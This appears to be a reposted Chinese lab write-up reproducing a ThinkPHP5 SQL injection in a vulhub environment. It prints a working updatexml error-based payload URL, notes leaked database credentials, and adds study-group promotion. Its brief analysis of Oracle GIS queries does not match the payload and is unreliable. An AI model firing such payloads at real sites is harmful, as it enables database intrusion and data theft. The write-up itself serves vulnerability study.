追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露

Posted Ms08067安全实验室

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露相关的知识,希望对你有一定的参考价值。

文章来源|MS08067 WEB攻防知识星球


漏洞复现分析  认准追洞小组


一、漏洞介绍

Thinkphp是一个开源的,快速、简单的面向对象的轻量级PHP开发框架


二、影响版本

ThinkPHP < 5.1.23


三、漏洞复现


采用vulhub快速搭建

追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露

启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2 ,即可看到用户名被显示了出来,说明环境运行成功。

http://192.168.47.130/index.php?ids[]=1&ids[0,updatexml(0,concat(0x7e,user()),0)]=2

追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露

可以之间看到存在敏感信息泄露

追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露

可以发现数据库的账号、密码:为 root 、root


四、漏洞分析

该漏洞需要开发者使用了GIS中聚合查询的功能,用户在oracle的数据库且可控tolerance查询时的键名,在其位置注入SQL语句。

https://blog.csdn.net/qq_41832837/article/details/104066647



【追洞计划】顾名思义即追最新的漏洞,包括2020&2021所有Apache漏洞+主流框架,将会在星球内部招收感兴趣学员,纳入追洞小组。


追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露

 

主讲导师介绍:

Taoing:Ms08067安全实验室核心成员,现任安恒信息高级安全工程师,擅长web渗透测试,应急响应。

TtssGkf:Ms08067实验室核心成员,Defcon86021议题分享者,擅长领域:渗透测试,漏洞分析,代码审计,安全开发。



扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露 追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露

追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露

追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露 

目前36000+人已关注加入我们

以上是关于追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP5.1.x SQL注入(orderby注入)

ThinkPHP5.0.10 SQL注入

ThinkPHP5.1.x SQL注入(update方法)

ThinkPHP5x-Mysql 聚合函数相关方法注入

TP5 框架 SQL 执行流程分析及 5.0.9 SQL 注入漏洞分析

TP5 框架 SQL 执行流程分析及 5.0.9 SQL 注入漏洞分析